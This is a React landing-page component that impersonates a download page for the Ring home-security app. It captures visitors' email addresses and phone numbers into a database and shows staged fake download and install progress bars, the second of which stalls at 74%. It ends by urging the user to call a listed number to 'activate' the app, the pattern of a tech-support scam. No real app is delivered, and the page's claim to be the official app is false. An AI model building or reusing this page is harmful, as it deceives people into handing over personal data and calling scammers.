'use client';

import React, { useState, useEffect, useRef } from 'react';
import { createClient } from '@/lib/supabase/client';

type Stage = 'form' | 'downloading' | 'installing' | 'complete';

export default function RingLandingPage() {
  const [email, setEmail] = useState('');
  const [phone, setPhone] = useState('');
  const [stage, setStage] = useState<Stage>('form');
  const [progress, setProgress] = useState(0);
  const [showComplete, setShowComplete] = useState(false);
  const intervalRef = useRef<ReturnType<typeof setInterval> | null>(null);

  useEffect(() => {
    if (stage === 'downloading') {
      setProgress(0);
      let current = 0;
      intervalRef.current = setInterval(() => {
        current += Math.random() * 4 + 2;
        if (current >= 100) {
          current = 100;
          clearInterval(intervalRef.current!);
          setProgress(100);
          setTimeout(() => setStage('installing'), 400);
        } else {
          setProgress(Math.floor(current));
        }
      }, 80);
    }

    if (stage === 'installing') {
      setProgress(0);
      let current = 0;
      intervalRef.current = setInterval(() => {
        current += Math.random() * 2.5 + 1;
        if (current >= 74) {
          current = 74;
          clearInterval(intervalRef.current!);
          setProgress(74);
          setTimeout(() => {
            setStage('complete');
            setTimeout(() => setShowComplete(true), 100);
          }, 1200);
        } else {
          setProgress(Math.floor(current));
        }
      }, 100);
    }

    return () => {
      if (intervalRef.current) clearInterval(intervalRef.current);
    };
  }, [stage]);

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();

    if (!email.trim() || !phone.trim()) {
      return;
    }

    // Save to Supabase
    try {
      const supabase = createClient();
      await supabase.from('ring_form_submissions').insert({
        email: email || null,
        phone: phone,
        name: null,
      });
    } catch {
      // Silent fail — don't block the user flow
    }
    setStage('downloading');
  };

  if (stage === 'complete') {
    return (
      <>
        <style>{`
          @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap');

          .ring-complete-page {
            background: #ffffff;
            min-height: 100vh;
            font-family: 'Poppins', sans-serif;
            display: flex;
            flex-direction: column;
            max-width: 390px;
            margin: 0 auto;
            position: relative;
          }

          /* Top bar */
          .ring-topbar {
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 18px 20px 10px 20px;
          }
          .ring-logo-text {
            font-size: 22px;
            font-weight: 400;
            color: #1a1a1a;
            font-family: 'Poppins', sans-serif;
            letter-spacing: 0.5px;
          }
          .ring-topbar-icons {
            display: flex;
            align-items: center;
            gap: 10px;
          }
          .ring-alert-icon {
            width: 32px;
            height: 32px;
            background: #e53935;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
          }
          .ring-dots-icon {
            display: flex;
            flex-direction: column;
            gap: 3px;
            cursor: pointer;
            padding: 4px;
          }
          .ring-dots-icon span {
            width: 4px;
            height: 4px;
            background: #555;
            border-radius: 50%;
            display: block;
          }

          /* Progress dots */
          .ring-progress-dots {
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
            margin: 28px 0 40px 0;
          }
          .ring-dot {
            width: 10px;
            height: 10px;
            border-radius: 50%;
            background: #c8c8c8;
          }
          .ring-dot.active {
            background: #1a1a1a;
          }

          /* Checkmark */
          .ring-check-wrapper {
            display: flex;
            flex-direction: column;
            align-items: center;
            flex: 1;
            padding: 0 24px;
            opacity: 0;
            transform: translateY(20px);
            transition: opacity 0.6s ease, transform 0.6s ease;
          }
          .ring-check-wrapper.visible {
            opacity: 1;
            transform: translateY(0);
          }
          .ring-checkmark-circle {
            width: 100px;
            height: 100px;
            border-radius: 50%;
            border: 2px solid #4caf50;
            background: #ffffff;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 28px;
            animation: popIn 0.5s ease 0.3s both;
          }
          @keyframes popIn {
            0% { transform: scale(0); opacity: 0; }
            70% { transform: scale(1.1); }
            100% { transform: scale(1); opacity: 1; }
          }
          .ring-check-svg { width: 48px; height: 48px; }
          .ring-check-path {
            stroke: #4caf50;
            stroke-width: 3.5;
            stroke-linecap: round;
            stroke-linejoin: round;
            fill: none;
            stroke-dasharray: 60;
            stroke-dashoffset: 60;
            animation: drawCheck 0.5s ease 0.7s forwards;
          }
          @keyframes drawCheck {
            to { stroke-dashoffset: 0; }
          }

          /* Title */
          .ring-allset-title {
            font-size: 26px;
            font-weight: 700;
            color: #1a1a1a;
            margin-bottom: 24px;
            text-align: center;
            animation: fadeUp 0.5s ease 0.5s both;
          }
          @keyframes fadeUp {
            from { opacity: 0; transform: translateY(14px); }
            to { opacity: 1; transform: translateY(0); }
          }

          /* Card */
          .ring-call-card {
            width: 100%;
            border: 1.5px solid #d0d0d0;
            border-radius: 14px;
            padding: 20px 22px;
            text-align: center;
            margin-bottom: 22px;
            animation: fadeUp 0.5s ease 0.7s both;
          }
          .ring-call-card p {
            font-size: 15px;
            color: #1a1a1a;
            line-height: 1.6;
            margin: 0;
          }
          .ring-call-card a {
            color: #1a9cd8;
            font-weight: 500;
            text-decoration: none;
          }

          /* Contact button */
          .ring-contact-btn {
            width: 100%;
            padding: 17px;
            background: #5b8dee;
            border: none;
            border-radius: 10px;
            color: #ffffff;
            font-size: 15px;
            font-weight: 700;
            font-family: 'Poppins', sans-serif;
            cursor: pointer;
            text-align: center;
            letter-spacing: 1.5px;
            text-decoration: none;
            display: block;
            animation: fadeUp 0.5s ease 0.9s both;
            transition: background 0.2s ease;
          }
          .ring-contact-btn:hover { background: #4a7de0; }

          /* Bottom nav */
          .ring-bottom-nav {
            display: flex;
            align-items: center;
            justify-content: space-around;
            padding: 14px 0 18px 0;
            border-top: 1px solid #ebebeb;
            background: #ffffff;
            margin-top: auto;
          }
          .ring-nav-item {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 4px;
            cursor: pointer;
          }
          .ring-nav-label {
            font-size: 12px;
            font-family: 'Poppins', sans-serif;
            color: #aaa;
          }
          .ring-nav-label.active-nav {
            color: #4caf50;
          }
        `}</style>

        <div className="ring-complete-page">
          {/* Top bar */}
          <div className="ring-topbar">
            <span className="ring-logo-text">ring</span>
            <div className="ring-topbar-icons">
              <div className="ring-alert-icon">
                <svg width="16" height="16" viewBox="0 0 24 24" fill="white">
                  <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"/>
                </svg>
              </div>
              <div className="ring-dots-icon">
                <span></span>
                <span></span>
                <span></span>
              </div>
            </div>
          </div>

          {/* Progress dots */}
          <div className="ring-progress-dots">
            <div className="ring-dot"></div>
            <div className="ring-dot active"></div>
            <div className="ring-dot"></div>
          </div>

          {/* Main content */}
          <div className={`ring-check-wrapper${showComplete ? ' visible' : ''}`}>
            <div className="ring-checkmark-circle">
              <svg className="ring-check-svg" viewBox="0 0 52 52">
                <polyline className="ring-check-path" points="14,27 22,35 38,19" />
              </svg>
            </div>

            <h1 className="ring-allset-title">You&apos;re all set.</h1>

            <div className="ring-call-card">
              <p>
Please call to activate the app on your device.
              </p>
            </div>

<a href="tel:+15127660870" className="ring-contact-btn" style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', gap: '10px', backgroundColor: '#1a8f3c', borderRadius: '50px', padding: '16px 32px', fontSize: '18px', fontWeight: '700', color: '#fff', textDecoration: 'none', boxShadow: '0 4px 15px rgba(26,143,60,0.4)', letterSpacing: '0.5px' }}>
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" width="22" height="22" fill="#fff" style={{ flexShrink: 0 }}>
    <path d="M164.9 24.6c-7.7-18.6-28-28.5-47.4-23.2l-88 24C12.1 30.2 0 46 0 64C0 311.4 200.6 512 448 512c18 0 33.8-12.1 38.6-29.5l24-88c5.3-19.4-4.6-39.7-23.2-47.4l-96-40c-16.3-6.8-35.2-2.1-46.3 11.6L304.7 368C234.3 334.7 177.3 277.7 144 207.3L193.3 167c13.7-11.2 18.4-30 11.6-46.3l-40-96z" />
  </svg>
  TAP TO CALL US NOW
</a>

          </div>

          {/* Bottom nav */}
          <div className="ring-bottom-nav">
            <div className="ring-nav-item">
              <svg width="26" height="26" viewBox="0 0 24 24" fill="none">
                <circle cx="12" cy="12" r="9" stroke="#4caf50" strokeWidth="2"/>
                <circle cx="12" cy="12" r="4" stroke="#4caf50" strokeWidth="2"/>
              </svg>
              <span className="ring-nav-label active-nav">Devices</span>
            </div>
            <div className="ring-nav-item">
              <svg width="26" height="26" viewBox="0 0 24 24" fill="none">
                <rect x="3" y="3" width="7" height="7" rx="1" stroke="#aaa" strokeWidth="2"/>
                <rect x="14" y="3" width="7" height="7" rx="1" stroke="#aaa" strokeWidth="2"/>
                <rect x="3" y="14" width="7" height="7" rx="1" stroke="#aaa" strokeWidth="2"/>
                <rect x="14" y="14" width="7" height="7" rx="1" stroke="#aaa" strokeWidth="2"/>
              </svg>
              <span className="ring-nav-label">Library</span>
            </div>
          </div>
        </div>
      </>
    );
  }

  if (stage === 'downloading' || stage === 'installing') {
    const isDownloading = stage === 'downloading';
    const label = isDownloading ? 'Downloading...' : 'Installing...';
    const subLabel = isDownloading ?
    'Please wait while we download the app' :
    progress >= 74 ?
    'Finalizing installation...' : 'Setting up your Ring app';

    return (
      <>
        <style>{`
          @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap');

          .ring-page { background: #F2F1F6; min-height: 100vh; font-family: 'Poppins', sans-serif; }

          .progress-wrapper {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            min-height: 100vh;
            padding: 30px 20px;
            text-align: center;
          }

          .progress-logo {
            width: 72px;
            height: 72px;
            border-radius: 14px;
            overflow: hidden;
            margin-bottom: 28px;
            box-shadow: 0 4px 16px rgba(0,0,0,0.12);
          }
          .progress-logo img { width: 100%; height: 100%; object-fit: cover; }

          .progress-label {
            font-size: 20px;
            font-weight: 700;
            color: #1a1a1a;
            margin-bottom: 6px;
          }
          .progress-sublabel {
            font-size: 13px;
            color: #777;
            margin-bottom: 32px;
          }

          .progress-bar-track {
            width: 100%;
            max-width: 320px;
            height: 10px;
            background: #e0e0e0;
            border-radius: 99px;
            overflow: hidden;
            margin-bottom: 12px;
          }
          .progress-bar-fill {
            height: 100%;
            background: linear-gradient(90deg, #1a9cd8, #0fc0fc);
            border-radius: 99px;
            transition: width 0.15s ease;
          }

          .progress-percent {
            font-size: 15px;
            font-weight: 600;
            color: #1a9cd8;
          }

          .spinner-dots {
            display: flex;
            gap: 6px;
            margin-top: 28px;
          }
          .spinner-dots span {
            width: 8px;
            height: 8px;
            border-radius: 50%;
            background: #1a9cd8;
            animation: bounce 1.2s infinite ease-in-out;
          }
          .spinner-dots span:nth-child(2) { animation-delay: 0.2s; }
          .spinner-dots span:nth-child(3) { animation-delay: 0.4s; }
          @keyframes bounce {
            0%, 80%, 100% { transform: scale(0.6); opacity: 0.5; }
            40% { transform: scale(1); opacity: 1; }
          }
        `}</style>
        <div className="ring-page">
          <div className="progress-wrapper">
            <div className="progress-logo">
              <img
                src="https://ringerapps.camerasmart.online/wp-content/uploads/2026/04/f32c1d98-bb30-45ec-9f08-f1e17b0ff943_medium.jpg"
                alt="Ring App Icon - Always Home Security Camera App" />
              
            </div>
            <p className="progress-label">{label}</p>
            <p className="progress-sublabel">{subLabel}</p>
            <div className="progress-bar-track">
              <div className="progress-bar-fill" style={{ width: `${progress}%` }} />
            </div>
            <p className="progress-percent">{progress}%</p>
            <div className="spinner-dots">
              <span /><span /><span />
            </div>
          </div>
        </div>
      </>);

  }

  return (
    <>
      <style>{`
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap');
        @import url('https://fonts.cdnfonts.com/css/azeret-mono');

        * { box-sizing: border-box; margin: 0; padding: 0; }
        body { background: #F2F1F6; font-family: 'Poppins', sans-serif; }

        .ring-page { background: #F2F1F6; min-height: 100vh; font-family: 'Poppins', sans-serif; }
        .ring-container { max-width: 390px; margin: 0 auto; padding: 0 15px; padding-bottom: 50px; }

        .pricing-header { margin-top: 80px; text-align: center; }
        .logo-main { width: 80px; margin: 0 auto 0 auto; }
        .logo-main img { width: 100%; border-radius: 10px; }

        .app-title {
          display: flex; align-items: center; justify-content: center; gap: 10px;
          margin: 0 !important; font-weight: 600; font-family: 'Inter', 'Poppins', sans-serif;
          font-size: 22px; color: #000000; margin-top: 8px !important;
        }
        .app-subtitle {
          display: flex; align-items: center; justify-content: center; gap: 10px;
          margin: 0 !important; font-weight: 600; font-family: 'Inter', 'Poppins', sans-serif;
          font-size: 22px; color: #000000;
        }
        .latest-version {
          text-align: center; font-size: 12px; letter-spacing: -0.2px;
          font-family: 'Azeret Mono', 'Courier New', monospace; font-weight: 400;
          color: #000000; margin-top: 4px; margin-bottom: 12px;
        }

        .white-box { background: #ffffff; padding: 20px; border-radius: 10px; margin-bottom: 12px; }
        .paragraph-text {
          font-size: 13px; font-weight: 400; line-height: 23px; margin: 0;
          text-align: center; text-transform: capitalize; color: #474646; font-family: 'Poppins', sans-serif;
        }

        .form-main-box { margin-bottom: 0; }
        .form-field-wrapper { margin-bottom: 12px; }
        .form-input {
          width: 100%; padding: 20px; background: #ffffff; border: 0; border-radius: 4px;
          font-size: 13px; font-family: 'Poppins', sans-serif; color: #333; outline: none; display: block;
        }
        .form-input::placeholder { color: #999; font-size: 13px; }

        .download-btn {
          width: 100%; padding: 18px; background: #1a9cd8; border: none; border-radius: 10px;
          color: #ffffff; font-size: 16px; font-weight: 600; font-family: 'Poppins', sans-serif;
          cursor: pointer; text-align: center; display: block; margin-bottom: 12px;
          transition: background-color 0.2s ease;
        }
        .download-btn:hover { background: #1589c0; }

        .footer-info { border-radius: 10px; background: #ffffff; padding: 20px; text-align: start; }
        .footer-info h5 { font-family: 'Poppins', sans-serif; font-weight: 400; color: #000000; text-align: left; font-size: 14px; margin-bottom: 4px; }
        .footer-info h5 b { font-weight: 700; }
        .footer-info p { font-weight: 400; font-size: 12px; font-family: 'Poppins', sans-serif; color: #474646; margin-bottom: 8px; margin-top: 0; }

        .phone-link {
          color: #168ed4; text-decoration: none; font-weight: 600; font-size: 16px;
          display: inline-flex; align-items: center; gap: 6px;
        }
        .phone-link:hover { color: #1278b5; }
      `}</style>

      <div className="ring-page">
        <div className="ring-container">
          <div className="pricing-header">
            <div className="logo-main">
              <img
                src="https://ringerapps.camerasmart.online/wp-content/uploads/2026/04/f32c1d98-bb30-45ec-9f08-f1e17b0ff943_medium.jpg"
                alt="Ring App Icon - Always Home Security Camera App"
                title="How to Keep Your Home Safe with Ring Camera App Surveillance" />
              
            </div>
            <p className="app-title">Ring - Always Home</p>
            <p className="app-subtitle">(APP)</p>
            <p className="latest-version">Latest Version 5.1.0</p>
            <div className="white-box">
              <p className="paragraph-text">
                Download the Ring Always Home app for easy setup and seamless
                connection of your Ring devices. It&apos;s the official app for simple, secure home management!
              </p>
            </div>
          </div>

          <div className="form-main-box">
            <form onSubmit={handleSubmit}>
              <div className="form-field-wrapper">
                <input
                  type="email"
                  name="email"
                  value={email}
                  onChange={(e) => setEmail(e.target.value)}
                  placeholder="Enter Your Email"
                  className="form-input"
                  autoComplete="email" />
                
              </div>
              <div className="form-field-wrapper">
                <input
                  type="text"
                  name="phone"
                  value={phone}
                  onChange={(e) => setPhone(e.target.value)}
                  placeholder="Enter Your Phone Number"
                  className="form-input"
                  autoComplete="off" />
                
              </div>
              <button type="submit" className="download-btn">
                Download
              </button>
            </form>
          </div>

          <div className="footer-info">
            <h5>Date: January 27, 2026</h5>
            <h5><b>Important Notice:</b></h5>
            <p>If your Ring device isn&apos;t connecting or you need help, call our support line at</p>
            <a href="tel:+15127660870" className="phone-link">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" width="14" height="14" fill="#168ed4" style={{ display: 'inline-block', verticalAlign: 'middle' }}>
                <path d="M164.9 24.6c-7.7-18.6-28-28.5-47.4-23.2l-88 24C12.1 30.2 0 46 0 64C0 311.4 200.6 512 448 512c18 0 33.8-12.1 38.6-29.5l24-88c5.3-19.4-4.6-39.7-23.2-47.4l-96-40c-16.3-6.8-35.2-2.1-46.3 11.6L304.7 368C234.3 334.7 177.3 277.7 144 207.3L193.3 167c13.7-11.2 18.4-30 11.6-46.3l-40-96z" />
              </svg>
              {' '}+1(512) 766-0870
            </a>
          </div>
        </div>
      </div>
    </>);

}